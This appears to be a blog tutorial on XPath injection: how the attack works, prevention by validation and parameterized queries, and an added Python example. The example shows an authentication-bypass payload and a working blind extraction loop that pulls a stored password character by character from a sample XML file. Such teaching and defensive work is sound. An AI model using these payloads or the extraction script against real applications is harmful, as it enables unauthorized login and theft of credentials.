abg man

What is XPath Injection and How XPath Injection Helps in Website Database Hacking


This post explains what XPath injection is and how it works. The same knowledge serves both sides: it is used to attack web applications, and it is what a developer needs in order to secure one. Let's start.

How XPath Injection Works


Working Of XPath Injection
Similar to SQL injection, XPath injection occurs when a web site uses user-supplied input to construct an XPath query over XML data. By sending intentionally malformed input, an attacker can learn how the XML data is structured or read data they are not normally allowed to access. If the XML data is used for authentication (for example an XML-based user file), the attacker may even be able to elevate their privileges on the site.

Querying XML is done with XPath, a simple, declarative expression language that locates pieces of information in an XML document. Like SQL, it lets you specify which attributes to find and which patterns to match. A web site that stores content in XML commonly accepts some input on the query string to identify the content to locate and display. That input must be validated so that it cannot alter the structure of the XPath query and make it return data it should not.
XPath is a standard language whose syntax is implementation independent (apart from version differences between XPath 1.0 and later versions), which makes attacks easy to automate. Unlike SQL, where each database has its own dialect and payloads must be adapted to the back end, an XPath payload behaves the same way against every implementation.
XPath also has no access control of its own: the query runs against the whole document, so a successful injection can read the entire XML file. None of the limitations an attacker may run into with SQL injection (table permissions, per-user grants, restricted views) apply here.
In a typical web application architecture, all data is stored on a back-end server. That server may hold data in various forms, such as an RDBMS database, an LDAP directory, or XML documents. Based on the user's input, the application queries the server and retrieves information. Attackers extract more information than they are allowed to by manipulating the query with specially crafted input. Here, we discuss XPath injection techniques for extracting data from XML data stores. Before going deeper into XPath injection, let's take a brief look at what XML is and how an XPath query is formed.

What is XPath Injection?

XPath injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input in order to query or navigate XML documents. XPath may be used directly by an application to query an XML document, or as part of a larger operation such as applying an XSLT transformation or an XQuery to an XML document.
In XPath injection, the attacker supplies input that makes the application execute an XPath query the attacker controls. When successful, this allows the attacker to bypass authentication entirely or to read information without proper authorization.

XML and XPATH

XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to define their own tags for storing data. An XML document is similar to an RDBMS database except for the way the data is stored: in a database, data is held in tables of rows and columns, whereas in XML it is held in nodes arranged as a tree. The XML Path language, XPath, is used to query information from the nodes of an XML document. Path expressions select elements and attributes in the document and evaluate to a node-set, a string, a Boolean, or a number. XPath also provides a library of built-in functions for string handling, numeric and Boolean operations, and node-sets (later versions add many more, including date and time comparison).
Let us take an example of an XML document called users.xml and see how an XPath expression can be used to retrieve information:

The function selectNodes takes as its parameter a path expression, which here extracts the value of the cardno node under the savings node in users.xml. The path expression for cardno in this case is /users/savings/cardno

The result of the above query will be—

568100123412

When an application has to retrieve information from the XML based on user input, it builds an XPath query from that input and evaluates it on the server. If the input is spliced directly into the expression, the user controls part of the query.
____________________________________________________________________________________

Prevention

XPath injection can be prevented in much the same way as SQL injection. Some of the preventive measures are:
Input Validation: one of the best measures to defend applications against XPath injection. The developer has to ensure that the application does not accept malicious input. Deciding exactly what constitutes malicious input is difficult, but there are some best practices a developer can follow: validate each field against an allowlist of the characters and length it is expected to contain, and treat the XPath metacharacters (single and double quotes, square brackets, slashes, and the and/or keywords) as a sign of an attack rather than trying to escape them case by case.
Parameterized Queries: another way to prevent XPath injection is to use parameterized queries. We have seen that XPath queries are formed as expressions that get evaluated dynamically at run time. In a parameterized query the expression is fixed in advance, and instead of pasting user input into the expression, the input is passed as variables.
If we take the following concatenated query:
"//users[LoginID/text()='" + txtLoginID.Text + "' and passwd/text()='" + txtPasswd.Text + "']"
and pass the inputs as parameters instead, the query looks like this:
"//users[LoginID/text()= $LoginID and passwd/text()= $password]"
The input never becomes part of the query expression. It is bound to the variables $LoginID and $password and compared as a literal value, so an injected string such as ' or '1'='1 is simply looked up as a login ID, matches nothing in the XML document, and the login fails. This prevents injection attacks.
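The concatenated login query and its parameterized form above, together with the two claims from the "How XPath Injection Works" section (that an attacker can discover how the XML is structured and read the whole document), as one worked example. This is added example code, not code from the original post, written in Python with lxml, whose xpath() method evaluates XPath 1.0 and binds variables from keyword arguments. The users.xml content is a constructed sample, and login_vulnerable, login_parameterized, oracle and blind_extract are names chosen here. The blind loop uses nothing but the yes/no answer of the login form: the password field is injected so that the predicate reduces to an arbitrary condition, and string-length() and substring() are asked one character at a time.

```python
"""Vulnerable XPath login, the classic bypass, blind extraction, and the fix.

Added worked example (not code from the original post). Uses lxml, whose
xpath() method supports XPath 1.0 and variable binding via keyword arguments.
"""
import string

from lxml import etree

# Constructed sample document standing in for the post's users.xml.
USERS_XML = b"""<?xml version="1.0"?>
<users>
  <user>
    <LoginID>admin</LoginID>
    <passwd>s3cret!</passwd>
    <role>administrator</role>
  </user>
  <user>
    <LoginID>bob</LoginID>
    <passwd>bobpass</passwd>
    <role>member</role>
  </user>
</users>
"""
DOC = etree.fromstring(USERS_XML)


def login_vulnerable(login_id, passwd):
    """Builds the query by string concatenation, the pattern the post warns about.

    Returns the LoginID of the first matching user, or None when nothing matches.
    """
    query = ("//user[LoginID/text()='" + login_id
             + "' and passwd/text()='" + passwd + "']")
    matches = DOC.xpath(query)
    return matches[0].findtext("LoginID") if matches else None


def login_parameterized(login_id, passwd):
    """Same lookup with the input bound to XPath variables instead of spliced in.

    $login and $pw are compared as literal strings, so quotes and boolean
    operators in the input can never change the shape of the expression.
    """
    query = "//user[LoginID/text()=$login and passwd/text()=$pw]"
    matches = DOC.xpath(query, login=login_id, pw=passwd)
    return matches[0].findtext("LoginID") if matches else None


# Characters tried during blind extraction. The single quote is left out
# because it would terminate the injected string literal.
CHARSET = string.ascii_letters + string.digits + " !#$%&()*+,-./:;<=>?@[]^_`{|}~"


def oracle(condition):
    """True iff CONDITION is true when evaluated inside the injected predicate.

    The payload goes into the password field, so the predicate becomes
        LoginID/text()='admin' and passwd/text()='' or CONDITION and '1'='1'
    'and' binds tighter than 'or', the left-hand term is always false (no
    user has an empty password), and the whole predicate reduces to CONDITION.
    """
    payload = "' or " + condition + " and '1'='1"
    return login_vulnerable("admin", payload) is not None


def blind_extract(expr, max_len=64):
    """Recover the string value of an XPath expression one character at a time,
    using only the yes/no answer of the login form. Unknown characters become '?'.
    """
    length = 0
    for n in range(0, max_len + 1):
        if oracle("string-length(%s)=%d" % (expr, n)):
            length = n
            break
    out = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle("substring(%s,%d,1)='%s'" % (expr, pos, ch)):
                out += ch
                break
        else:
            out += "?"
    return out


if __name__ == "__main__":
    print(login_vulnerable("' or '1'='1", "' or '1'='1"))    # admin (bypass)
    print(login_parameterized("' or '1'='1", "' or '1'='1"))  # None
    print(blind_extract("name(/*[1])"))        # root element name: users
    print(blind_extract("//user[1]/passwd"))   # first user's password: s3cret!
```

The bypass works because `' or '1'='1` in both fields turns the predicate into `A or (B and C) or true`, which is true for every user node, and the application takes the first match. The parameterized version is given exactly the same input and returns nothing, since no LoginID equals the literal string. The extraction loop costs roughly one request per candidate character per position, which is the same budget an attacker has against a real form; rate limiting and account lockout on failed logins therefore also raise the cost of this attack, though they are no substitute for fixing the query.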

